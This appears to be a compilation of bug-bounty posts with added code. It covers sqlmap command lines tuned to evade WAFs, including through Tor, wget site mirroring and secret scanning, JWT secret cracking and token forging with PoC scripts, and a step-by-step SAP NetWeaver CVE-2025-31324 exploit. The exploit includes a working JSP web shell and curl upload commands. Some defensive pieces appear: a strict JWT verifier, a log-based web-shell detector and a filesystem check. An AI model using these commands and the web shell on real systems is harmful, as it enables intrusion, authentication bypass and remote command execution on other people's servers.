Use Case: Slow, stealthy testing to avoid WAF/IPS. --delay spaces the requests, --threads=1 keeps them sequential, and --random-agent varies the User-Agent.
sqlmap -u "http://target.com/page.php?id=1" \
  --random-agent \
  --tamper=space2comment,between,charunicodeescape \
  --delay=2 --timeout=10 \
  --retries=5 \
  --threads=1 \
  --technique=BEUSTQ \
  --level=3 --risk=2
──────────────────
2. Aggressive Mode with WAF Evasion
Use Case: For deeper exploitation when stealth is less critical. --level=5 --risk=3 tries every payload and parameter location sqlmap knows, including the data-modifying ones.
sqlmap -u "http://target.com/page.php?id=1" \
  --random-agent \
  --tamper=space2comment,charencode,unmagicquotes,versionedmorekeywords \
  --level=5 --risk=3 \
  --batch --threads=5 \
  --technique=BEUSTQ
──────────────────
3. Blind Time-Based SQLi Detection
Use Case: For blind injections using SLEEP, BENCHMARK, or pg_sleep. --technique=T restricts sqlmap to time-based tests and --time-sec sets the delay it injects; keep the thread count at 1 here, because parallel requests skew the timing measurement the detection depends on.
sqlmap -u "http://target.com/page.php?id=1" \
  --random-agent \
  --tamper=space2comment,modsecurityversioned,between \
  --technique=T \
  --time-sec=5 \
  --level=5 --risk=3 \
  --batch
──────────────────
4. Obfuscated Payloads for Bypassing WAFs
Use Case: When facing intelligent WAFs that detect classic patterns.
sqlmap -u "http://target.com/page.php?id=1" \
  --tamper=charunicodeescape,randomcase,space2comment,versionedkeywords \
  --random-agent \
  --level=5 --risk=3 \
  --threads=1 --delay=1 \
  --batch
──────────────────
5. POST Parameter Injection with Custom Headers
Use Case: Testing login forms, and WAFs or applications that trust a spoofed client address. --data already makes sqlmap send a POST, so --method=POST is redundant but harmless; X-Forwarded-For only helps when the WAF or the application trusts that header.
sqlmap -u "http://target.com/login.php" \
  --data="username=admin&password=1234" \
  --method=POST \
  --headers="X-Forwarded-For: 127.0.0.1" \
  --random-agent \
  --tamper=space2comment,charunicodeescape \
  --level=5 --risk=3 \
  --batch
──────────────────
6. Using TOR with WAF Evasion
Use Case: Anonymous testing through TOR while bypassing WAF. --check-tor verifies that traffic really leaves through Tor before any payload is sent.
sqlmap -u "http://target.com/page.php?id=1" \
  --tor --tor-type=SOCKS5 --check-tor \
  --random-agent \
  --delay=2 --timeout=10 \
  --tamper=space2comment,charunicodeescape,modsecurityversioned \
  --batch
──────────────────
Recommended Tamper Scripts
| Tamper Script          | Description
| ---------------------- | -------------------------------------------
| `space2comment`        | Replaces each space with a `/**/` comment
| `charunicodeescape`    | Unicode-escapes payload characters (`S` becomes `\u0053`)
| `randomcase`           | Randomizes the case of each keyword character
| `between`              | Rewrites `>` as `NOT BETWEEN 0 AND` and `=` as `BETWEEN # AND #`
| `versionedkeywords`    | Wraps each non-function keyword in a MySQL versioned comment (`/*!SELECT*/`)
| `equaltolike`          | Replaces `=` with `LIKE`
| `unmagicquotes`        | Replaces a quote with the multibyte sequence `%BF%27` and appends a comment, to defeat addslashes-style escaping on GBK-like charsets
| `modsecurityversioned` | Wraps the whole query in a MySQL versioned comment, historically effective against ModSecurity
Bonus: Reuse a Profile
sqlmap reads reusable options from an INI configuration file, not from an @file argument. Run your preferred flags once with --save to write that file:
sqlmap -u "http://target.com/page.php?id=1" \
  --random-agent \
  --tamper=space2comment,charunicodeescape \
  --level=5 --risk=3 \
  --threads=1 --delay=1 --timeout=10 --retries=3 \
  --technique=BEUSTQ \
  --save="$HOME/sqlmap_stealth.conf"
Then edit the url line in the saved file for the next target and load it with -c:
sqlmap -c "$HOME/sqlmap_stealth.conf" --batch
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
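To make the tamper table concrete, here is an added example (not sqlmap's own code, and not part of the original post) with simplified re-implementations of four of the listed scripts, chained in order the way --tamper chains them, and run against three constructed regex rules that stand in for a signature-based WAF. The rule set and the keyword list are assumptions for the demonstration; sqlmap's real tamper scripts handle quoting and already-encoded input more carefully.

```python
import random
import re

# Simplified versions of sqlmap tamper transformations (assumed, not sqlmap's code).
SQL_KEYWORDS = ("UNION", "SELECT", "FROM", "WHERE", "AND", "OR", "ORDER", "BY")


def space2comment(p: str) -> str:
    return p.replace(" ", "/**/")


def between(p: str) -> str:
    p = re.sub(r"(\w+)\s*>\s*(\w+)", r"\1 NOT BETWEEN 0 AND \2", p)
    return re.sub(r"(\w+)\s*=\s*(\w+)", r"\1 BETWEEN \2 AND \2", p)


def randomcase(p: str, seed: int = 1) -> str:
    rng = random.Random(seed)  # seeded so repeated runs give the same output

    def flip(m):
        word = m.group()
        if word.upper() not in SQL_KEYWORDS:
            return word
        return "".join(c.upper() if rng.random() < 0.5 else c.lower() for c in word)

    return re.sub(r"[A-Za-z]+", flip, p)


def versionedkeywords(p: str) -> str:
    return re.sub(r"\b(%s)\b" % "|".join(SQL_KEYWORDS), r"/*!\1*/", p, flags=re.I)


TAMPERS = {"space2comment": space2comment, "between": between,
           "randomcase": randomcase, "versionedkeywords": versionedkeywords}

# Constructed signature rules resembling what a simple regex WAF would carry.
WAF_RULES = {
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "union_select_comment_aware": re.compile(r"\bunion(\s|/\*.*?\*/)+select\b", re.I),
    "tautology_equals": re.compile(r"\b(\w+)\s*=\s*\1\b", re.I),
}


def apply_chain(payload: str, chain: str) -> str:
    """Apply a comma-separated tamper chain left to right, as --tamper does."""
    for name in chain.split(","):
        payload = TAMPERS[name.strip()](payload)
    return payload


def rules_hit(payload: str) -> set:
    """Names of the constructed WAF rules that still match the tampered payload."""
    return {name for name, rx in WAF_RULES.items() if rx.search(payload)}
```

Run the same payload through different chains and compare rules_hit: space2comment defeats the whitespace-only rule but not the comment-aware one, versionedkeywords defeats both while MySQL still executes the query, randomcase changes nothing against case-insensitive rules, and between removes the tautology pattern entirely. That comparison is how you choose a chain for a specific WAF instead of stacking every script.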
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://target.com
What a local mirror gives you:
Analyze JavaScript files for hidden secrets, tokens, or API endpoints
Discover hidden or forgotten pages like /admin, /test, etc.
Search HTML comments for sensitive dev notes
Browse and inspect the full site locally, as often as you like, without sending further requests that could trigger WAFs or rate limits
The mirroring run itself is noisy, since it fetches every linked page. Add --wait=2 --random-wait to pace it, --user-agent to replace wget's default identifier (which many WAFs block outright), and -e robots=off only if you also want the paths that robots.txt excludes.
# Developer comments
grep -Ri "<!--" target.com
# API endpoints
grep -Ri "api" target.com
# Endpoints referenced from the mirrored pages and scripts
python3 linkfinder.py -i index.html -o cli
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
#wget
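The greps above find one pattern at a time. As an added example (not part of the original post), here is a scanner that walks a wget mirror and pulls out the three things the list names: endpoint paths quoted in JavaScript, credential-looking assignments and AWS access key IDs, and HTML comments. The sample mirror it builds in a temporary directory is constructed for the demonstration (the key in it is AWS's documented example key), and the endpoint prefixes and secret patterns are assumptions you would tune to the target application.

```python
import re
import tempfile
from pathlib import Path

# Constructed patterns; tune the endpoint prefixes to the application under test.
ENDPOINT_RE = re.compile(r"""["'`](/(?:api|v\d|admin|internal|graphql)[A-Za-z0-9_./?=&-]*)["'`]""")
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(AKIA[0-9A-Z]{16})\b"),
    "hardcoded_credential": re.compile(
        r"""(?i)(?:api[_-]?key|token|secret|password)["']?\s*[:=]\s*["']([^"']{8,})["']"""),
    "html_comment": re.compile(r"<!--(.*?)-->", re.S),
}
SCAN_SUFFIXES = {".js", ".html", ".htm", ".json"}


def scan_mirror(root):
    """Walk a wget mirror and return (kind, value, relative_path) findings."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = path.read_text(errors="ignore")
        rel = path.relative_to(root).as_posix()
        for m in ENDPOINT_RE.finditer(text):
            findings.append(("endpoint", m.group(1), rel))
        for kind, rx in SECRET_PATTERNS.items():
            for m in rx.finditer(text):
                findings.append((kind, m.group(1).strip(), rel))
    return findings


def make_sample_mirror():
    """Constructed stand-in for the target.com directory that wget --mirror creates."""
    root = Path(tempfile.mkdtemp())
    site = root / "target.com"
    (site / "static").mkdir(parents=True)
    (site / "index.html").write_text(
        '<!-- TODO: remove /admin/debug before launch -->\n'
        '<script src="static/app.js"></script>\n')
    (site / "static" / "app.js").write_text(
        'const API = "/api/v1/users";\n'
        'fetch("/api/v1/internal/export?format=csv");\n'
        'const awsKey = "AKIAIOSFODNN7EXAMPLE";  // constructed example key\n'
        'const password = "Summer2024!";\n')
    return root


if __name__ == "__main__":
    for kind, value, rel in scan_mirror(make_sample_mirror()):
        print(f"{kind:22} {rel:28} {value}")
```

Point scan_mirror at the directory wget created (scan_mirror("target.com")) and triage the endpoint findings against the paths you already know; the ones that appear only inside JavaScript are the forgotten or unlinked routes the post is after.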
API Authentication Bypass
Let's assume we have a vulnerable API endpoint:
https://example.com/api/v1/users
The API uses JSON Web Tokens (JWT) for authentication. We can use a tool like Burp Suite to intercept and manipulate the JWT token.
Step 1: Intercept JWT Token
Using Burp Suite, intercept the login request and capture the JWT token (the credentials travel in the body, so the login is a POST):
POST /api/v1/login HTTP/1.1
Host: example.com
Content-Type: application/json

{"username": "user", "password": "pass"}
Response:
HTTP/1.1 200 OK
Content-Type: application/json

{"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaGFuIjoiMjMwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"}
Step 2: Analyze JWT Token
Using a tool like jwt.io (or simply base64url-decoding the first two dot-separated segments), we can read the header to find the algorithm used (HS256) and the payload:
{
  "sub": "1234567890",
  "name": "John Doe",
  "iat": 1643723900,
  "exp": 1644329700
}
Step 3: Bypass Authentication
HS256 is symmetric: the same secret both signs and verifies, so whoever holds it can mint tokens the server accepts. That secret has to come from somewhere: a leaked configuration, a default value, or an offline dictionary attack against the captured token (jwt_tool -C -d wordlist.txt <token>), which works because every captured token is a signature you can test guesses against without touching the server. With the secret in hand, inject a far-future exp claim and re-sign with jwt_tool:
python3 jwt_tool.py <token> -I -pc exp -pv 2147483647 -S hs256 -p 'your_secret_key_here'
This produces a new token with the same identity claims and a longer expiration time. Use it to reach the protected endpoint:
GET /api/v1/users HTTP/1.1
Host: example.com
Authorization: Bearer <forged token from Step 3>
PoC Code
import jwt  # PyJWT
import requests

# Load the signing secret (obtained out of band: leaked config, default, or cracked)
with open('secret_key.txt', 'r') as f:
    secret_key = f.read().strip()

# Generate a new JWT with the same identity and a far-future expiration time
payload = {'sub': '1234567890', 'name': 'John Doe', 'iat': 1643723900, 'exp': 2147483647}
new_token = jwt.encode(payload, secret_key, algorithm='HS256')
if isinstance(new_token, bytes):  # PyJWT 1.x returned bytes, 2.x returns str
    new_token = new_token.decode()

# Present the forged token to the protected endpoint
headers = {'Authorization': f'Bearer {new_token}'}
response = requests.get('https://example.com/api/v1/users', headers=headers)
print(response.status_code, response.text)
Note: This is a basic example. The forged token is accepted only because the signing secret is known; without it an HS256 token cannot be forged, and the realistic findings are a weak secret recoverable offline, a verifier that honours alg=none or confuses an RS256 public key with an HMAC secret, or a server that never checks exp at all.
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
#wget #api
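The PoC above depends on PyJWT and on already having the secret. As an added example (not part of the original post), here is the whole chain in standard-library Python: minting an HS256 token, a verifier that pins the algorithm and checks exp, the two things an attacker without the secret can try (editing exp while keeping the old signature, and alg=none), the offline dictionary attack that recovers a weak secret from a captured token, and the re-signing step that the jwt_tool -I/-S command performs. The secret "secret123", the wordlist and the captured token are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Mint a token: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def verify_hs256(token: str, secret: bytes, now: int) -> Optional[dict]:
    """Server-side check done right: pin the algorithm, verify the MAC, then check exp."""
    try:
        h, b, s = token.split(".")
        if json.loads(b64url_decode(h)).get("alg") != "HS256":  # rejects alg=none / key confusion
            return None
        expected = hmac.new(secret, f"{h}.{b}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s)):
            return None
        payload = json.loads(b64url_decode(b))
        return payload if payload.get("exp", 0) > now else None
    except (ValueError, TypeError):
        return None


def tamper_without_key(token: str, new_exp: int) -> str:
    """Edit exp but keep the old signature: all an attacker without the secret can do."""
    h, b, s = token.split(".")
    payload = json.loads(b64url_decode(b))
    payload["exp"] = new_exp
    return f"{h}.{b64url(json.dumps(payload, separators=(',', ':')).encode())}.{s}"


def alg_none_token(token: str) -> str:
    """alg=none header with an empty signature; only a broken verifier accepts it."""
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}, separators=(",", ":")).encode())
    return f"{header}.{token.split('.')[1]}."


def crack_secret(token: str, wordlist: Iterable[str]) -> Optional[bytes]:
    """Offline dictionary attack: the captured token is an HMAC you can test guesses against."""
    h, b, s = token.split(".")
    target = b64url_decode(s)
    for word in wordlist:
        cand = hmac.new(word.encode(), f"{h}.{b}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(cand, target):
            return word.encode()
    return None


def forge_long_lived(token: str, secret: bytes, new_exp: int) -> str:
    """Keep the captured identity claims, push exp out, re-sign (the jwt_tool -I/-S step)."""
    payload = json.loads(b64url_decode(token.split(".")[1]))
    payload["exp"] = new_exp
    return sign_hs256(payload, secret)


# Constructed scenario: a weak server secret, a captured one-hour token, a small wordlist.
SERVER_SECRET = b"secret123"
ISSUED_AT = 1643723900
CAPTURED = sign_hs256({"sub": "1234567890", "name": "John Doe",
                       "iat": ISSUED_AT, "exp": ISSUED_AT + 3600}, SERVER_SECRET)
WORDLIST = ["password", "jwtsecret", "secret123", "changeme"]
```

Against verify_hs256 the key-less tamper and the alg=none token both fail, and the captured token stops working once exp has passed; the only route to a long-lived token is crack_secret followed by forge_long_lived, which succeeds here because the secret is in the wordlist. The defensive lesson is the mirror image: a long random secret makes the dictionary step infeasible, and pinning the algorithm closes the alg=none and RS256/HS256 confusion paths.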
Wide Spread: There are over 1200 SAP NetWeaver systems exposed to the internet worldwide that are at risk.
Exploitation Examples:
Uploading a malicious Web Shell to the folder
j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/
and then accessing it to execute commands via GET requests.
Stealing sensitive customer or financial data.
Disrupting business activities.
Lateral movement within the network and compromising other systems.
Attack Workflow:
1. The attacker prepares a malicious file (e.g., a Web Shell, or a JAR or ZIP file with malicious code embedded).
2. They send this file as part of an HTTP POST request to a path like:
/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader
3. Because the Visual Composer metadata uploader performs no authorization check (the flaw publicly tracked as CVE-2025-31324), the SAP NetWeaver server accepts the file from an unauthenticated client and stores it inside the portal's web root.
4. The attacker then follows up with an HTTP GET request to the Web Shell file (or triggers the uploaded Java code), gaining control over the system.
5. The attacker can now execute commands with the privileges of the SAP service user, steal data, or move laterally within the network.
5. Tools Used for Sending POST Requests
Attackers use tools that let them build and send HTTP requests manually or automatically. The most common are:
curl
A command-line tool available on Linux (and all major systems) for sending custom HTTP/HTTPS requests. Example usage:
curl -k -X POST -F "file=@webshell.jsp" https://target-sap-server/metadatauploader
Burp Suite
An advanced penetration testing tool that lets the attacker or security tester intercept, examine, and modify any HTTP request (GET/POST). Requests can be edited directly in the UI, or replayed and fuzzed with Repeater/Intruder to send many variants and compare the responses.
Postman
A comprehensive application for sending HTTP requests and API development. It allows sending files, modifying fields and headers, and analyzing responses, and is often used for manual testing to inspect a response and repeat the request.
Custom Scripts in Python/JavaScript
An advanced attacker might write a custom script using libraries like requests (Python) or axios (JavaScript) to send automated POST requests according to their attack scenario.
6. Technical Steps for Exploitation (For Study & Understanding Only)
Warning: These steps are shown for educational and awareness purposes only, and not for actual illegal application.
1. Prepare a Malicious File
The file could be a Web Shell in JSP, for example (it runs whatever the cmd parameter contains and streams the process output back into the page):
<% if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    java.io.InputStream in = p.getInputStream();
    int a = -1;
    while ((a = in.read()) != -1) {
        out.print((char) a);
    }
    in.close();
} %>
2. Send a POST Request to Upload the File
Using a tool like curl:
curl -k -X POST \
  -F "file=@webshell.jsp" \
  https://target-sap-server/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader
3. Access the File After Upload
Visit the path where the file is stored (example):
https://target-sap-server/irj/go/km/docs/webshell.jsp?cmd=whoami
The command is executed and its output returned in the page, confirming that the attacker has gained control of the server.
Defender's check: list the servlet_jsp/irj/root directory for .jsp files that were never deployed, and search the HTTP access logs for POST requests to the metadatauploader path followed by GET requests to .jsp files carrying a cmd parameter.
Disclaimer: This information is provided for educational and awareness purposes only. Unauthorized testing or exploitation of systems you do not own is illegal.
That's all, friends!
Happy hacking and see you next time!
#BugBounty #ssrf
#sqli #bypass
#api
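The two-request shape of the attack (an unauthenticated POST to the uploader, then a GET to a fresh .jsp with a cmd parameter) is easy to spot in access logs. As an added example (not part of the original post), here is detection logic that parses combined-format log lines, flags every POST to a metadatauploader path, and raises a higher-severity finding when a source that uploaded successfully later calls a .jsp under /irj/ with a cmd parameter. The log lines are constructed for the demonstration and reuse the paths from the post; the 30-minute window and the /irj/ prefix are assumptions to tune.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined log format) following the paths described above.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Apr/2025:10:00:01 +0000] "GET /irj/portal HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Apr/2025:10:00:09 +0000] "POST /irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.5 - - [24/Apr/2025:10:00:47 +0000] "GET /irj/go/km/docs/webshell.jsp?cmd=whoami HTTP/1.1" 200 311 "-" "python-requests/2.31"
198.51.100.9 - - [24/Apr/2025:10:02:13 +0000] "POST /irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader HTTP/1.1" 403 0 "-" "curl/8.5.0"
192.0.2.77 - - [24/Apr/2025:10:03:30 +0000] "GET /irj/portal/dashboard.jsp HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
UPLOADER_MARKER = "metadatauploader"   # matches the uploader path whatever prefix it sits under
SHELL_WINDOW = timedelta(minutes=30)   # assumed: how long after an upload a shell call still correlates


def parse_line(line: str):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return {"ip": ip, "ts": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "target": target, "status": int(status)}


def looks_like_shell_call(target: str) -> bool:
    """A .jsp under /irj/ invoked with a cmd parameter, as in the example URL above."""
    parts = urlsplit(target)
    return (parts.path.lower().endswith(".jsp") and parts.path.startswith("/irj/")
            and "cmd" in parse_qs(parts.query))


def detect(log_text: str):
    """Flag uploader POSTs; correlate successful ones with later shell calls from the same source."""
    findings, uploads = [], {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev:
            continue
        if ev["method"] == "POST" and UPLOADER_MARKER in ev["target"].lower():
            findings.append(("upload-attempt", ev["ip"], ev["status"], ev["ts"]))
            if ev["status"] == 200:
                uploads.setdefault(ev["ip"], []).append(ev["ts"])
        elif ev["method"] == "GET" and looks_like_shell_call(ev["target"]):
            prior = [t for t in uploads.get(ev["ip"], []) if timedelta(0) <= ev["ts"] - t <= SHELL_WINDOW]
            if prior:
                findings.append(("webshell-execution", ev["ip"], urlsplit(ev["target"]).path, ev["ts"]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(*finding)
```

Correlating by source address keeps false positives down but misses an attacker who uploads from one address and executes from another, so pair this with the filesystem check from the post: any .jsp in servlet_jsp/irj/root that is not in your deployment baseline is a finding on its own, whatever the logs say.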